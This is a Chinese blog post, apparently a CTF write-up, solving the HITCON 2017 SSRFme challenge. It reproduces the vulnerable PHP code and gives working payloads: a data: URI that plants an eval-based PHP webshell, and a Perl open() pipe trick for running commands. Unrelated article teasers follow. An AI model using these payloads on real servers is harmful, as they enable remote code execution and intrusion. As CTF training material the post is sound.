【HITCON 2017】SSRFme——最简单伪协议思路

2023-11-27 11:23 由 CAP_D 发表于 #其他

【HITCON 2017】SSRFme

1. 看题

代码：

<?php
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
    }

    echo $_SERVER["REMOTE_ADDR"];

    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
#sandbox/786c0b7e11c1e9322763fcc8090ef181
    @mkdir($sandbox);
    @chdir($sandbox); #更改当前工作目录

    $data = shell_exec("GET " . escapeshellarg($_GET["url"])); #escapeshellarg转义危险字符
    $info = pathinfo($_GET["filename"]);
    $dir  = str_replace(".", "", basename($info["dirname"]));
    @mkdir($dir);
    @chdir($dir);
    @file_put_contents(basename($info["basename"]), $data);
    highlight_file(__FILE__);

实现发送GET请求给当前GET参数’url‘，并将其结果保存在/sandbox/786c0b7e11c1e9322763fcc8090ef181/filename中，其中filename为传入的Get参数。

例如进行url传参：

http://59c29008-ea1f-4cf4-89c9-16cb955abca7.node4.buuoj.cn:81/?url=www.baidu.com&filename=upload/test.php

此时访问沙盒内容：

实现了将get百度后的数据内容存储。

2. 路径泄露

试试路径泄露，直接访问本机根目录：
```
http://59c29008-ea1f-4cf4-89c9-16cb955abca7.node4.buuoj.cn:81/?url=/&filename=upload/test.php
```
此时发现flag，就在根目录中：

但是GET命令并不能读文件，此时想的是通过一个远程主机写好马，然后get完之后将马存储在test.php中，实现远程写马。但是因为没有公网ip(还是穷)，而且推测get完远程主机返回的不一定是php代码而是html，所以作罢，想想其他思路。
这里存在一个readflag，于是测试一下访问它：
```
http://59c29008-ea1f-4cf4-89c9-16cb955abca7.node4.buuoj.cn:81/?url=/readflag&filename=upload/test.php
```
感觉是读flag的脚本，那现在需要做的就是执行它。

3. 思路一：SSRF配合伪协议

联想到之前有个题目中是file_put_contents函数使用data伪协议控制其内容，这里想通过GET后加data伪协议实现写马，payload:

http://2c421d36-abcf-46cb-9985-dc13ad0966a4.node4.buuoj.cn:81/?url=data:text/plain,'<?php @eval($_POST['capt'])?>'&filename=upload/test.php

至于为什么需要引号，可以在linux中测试，如果不加引号，命令行会因为<?等符号解析错误。

此时因为写入的文件名称后缀可以是php，所以直接访问沙河中的php文件，再使用蚁剑连接。但是直接打开根目录的flag显示为空。所以在蚁剑中打开命令行，运行readflag：

4. 思路二：perl语言漏洞

这也是大部分题解中的思路，利用perl语言的漏洞：

因为GET函数在底层调用了perl语言中的open函数，但是该函数存在rce漏洞。当open函数要打开的文件名中存在管道符（并且系统中存在该文件名），就会中断原有打开文件操作，并且把这个文件名当作一个命令来执行。

先创建该文件：

?url=&filename=|/readflag

再执行命令：

?url=file:|readflag&filename=123

最后访问123文件即可。但是网上的Payload我都没成功。

5. 总结

对于ssrf首先还是想到伪协议
perl语言的漏洞，管道符的利用
伪协议是看了网上题解都没有说的，所以“大话”最简单思路，敬请指正

热门相关：青莲剑说离婚合约：前妻的秘密觅仙道跟总裁假结婚的日子青莲剑说

RequestContextHolder跨线程获取不到requests请求对象的解决方法

# 一、前言最近在做一个项目，有个比较耗时的操作是启用线程进行异步操作，当时在启用的线程时，突然发现子线程无法获取父线程中的HttpServletRequest请求对象，因为是第一次遇到这种问题，所以记录一下解决方案。 # 二、问题模拟在这里，我们简单模拟一下出现的问题。我们首先编写一个简单的h ...阅读全文

Servlet p7 ServletContext对象

# ServletContext对象 **每一个 web 应用都有且仅有一个 ServletContext 对象**，又称为 Application 对象，从名称中可知，该对象是与应用程序相关的。在WEB 容器启动时，会为每一个 WEB 应用创建一个对应的 ServletContex对象。 **该对 ...阅读全文

web3 产品介绍： walletconnect 连接Web3 DApps与用户的移动加密钱包

WalletConnect是一种去中心化的开源协议，旨在连接Web3 DApps与用户的移动加密钱包，提供更安全、更便捷的加密货币交易体验。在本文中，我们将介绍WalletConnect的主要特点、工作原理以及如何使用它来连接DApps和移动钱包。一、WalletConnect的特点去中心化：W ...阅读全文

OctConv：八度卷积复现

摘要：不同于传统的卷积，八度卷积主要针对图像的高频信号与低频信号。本文分享自华为云社区《OctConv：八度卷积复现》，作者：李长安。论文解读八度卷积于2019年在论文《Drop an Octave: Reducing Spatial Redundancy in Convolutional ...阅读全文

接口自动化测试要做什么？只需要会这8个步骤...

作者的标题，是问做接口自动化测试的流程吗？如果是，那先了解下接口测试流程： 1、需求分析2、Api文档分析与评审3、测试计划编写4、用例设计与评审5、环境搭建（工具）6、执行用例7、缺陷管理8、测试报告了解了接口测试的工作流程，那"接口自动化测试"怎么弄？只需要在上篇文章的基础上再梳理下就可以。 ...阅读全文

Cobalt Strike之反向上线操作

Cobalt Strike 使用 GUI 框架 SWING（一种java GUI的库）开发，攻击者可通过CS木马在 beacon 元数据中注入恶意 HTML 标签，使得Cobalt Strike对其进行解析并且加载恶意代码（类似XSS攻击），从而在目标系统上执行任意代码。 ...阅读全文

不用编程超简单的自动化测试工具：Airtest入门篇教程

一、背景很多刚入行或从其他行业转行做测试的同学，日复一日每天做点工已经点得疲惫和麻木，觉得做测试和在厂子里打螺丝没太大区别。也想着做一做自动化测试，奈何自己看着代码就头痛，当初就是因为不喜欢编程才选择的做测试。亦或者由于从其他行业转行过来的，隔行如隔山，编程太痛苦。那么今天就给大家介绍一款无需编 ...阅读全文

判断子序列（双指针）

一、题目来源 AcWing算法基础课-2816.判断子序列二、题目描述给定一个长度为 \(n\) 的整数序列 \(a_1,a_2,…,a_n\) 以及一个长度为 \(m\) 的整数序列 \(b_1,b_2,…,b_m\)。请你判断 \(a\) 序列是否为 \(b\) 序列的子序列。子序列指序 ...阅读全文

RK3588-MPP解码详解

一. 简介 [RK3588从入门到精通] 专栏总目录本篇文章进行RK3588-MPP解码的详细解析二. 环境介绍硬件环境： ArmSoM-W3 RK3588开发板软件版本： OS：ArmSoM-W3 Debian11 三. 解码器数据流接口 3.1 decode_put_packet 输入码 ...阅读全文

docker 常用命令、安装、镜像加速配置

docker 笔记，请参考。常用命令官方学习网站，生涩。网上资料千奇百怪，建议到官网验证。可以用AI学习一点，但经常有错，像文心一言、通义千问。 https://docs.docker.com/engine/reference/run/ 以ubantu为例，你可以在docker安装一个ub ...阅读全文